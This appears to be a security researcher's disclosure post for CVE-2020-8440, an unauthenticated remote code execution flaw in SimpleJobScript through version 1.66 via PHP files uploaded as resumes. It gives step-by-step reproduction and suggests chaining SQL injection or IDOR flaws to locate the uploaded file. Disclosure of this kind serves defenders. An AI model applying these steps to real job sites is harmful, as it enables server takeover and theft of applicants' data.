CVE-2020-8440

January 29, 2020 One minute read

cve • upload • rce

controllers/page_apply.php in Simplejobscript.com SJS through 1.66 is prone to unauthenticated Remote Code Execution by uploading a PHP script as a resume.

mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8440
public announcement: https://github.com/niteosoft/simplejobscript/issues/10

Description:
controllers/page_apply.php in simplejobscript.com SJS <=1.66 is prone to unauthenticated Remote Code Execution by uploading a PHP script as a resume.

Details:
File: /controllers/page_apply.php URL: /apply
Parameter: cv

Steps to Reproduce:
1/ Apply for a job and attach a PHP file as your resume
2/ Browse the upload directory http://local.simplejobscript.net/uploads/cvs/
3/ Run the PHP file

Additional information:
If you can’t see the content of the upload directory (directory indexing is off), it can be hard to guess the final filename of your malicious resume because of the uniqid generated. However, you can use one of the multiple SQL injection (CVE-2020-7229) then read the content of the table applicant or use one of the multiples IDOR available to have access to all applications of all companies.

PoC:
cve-2020-8440 SimpleJobScript file upload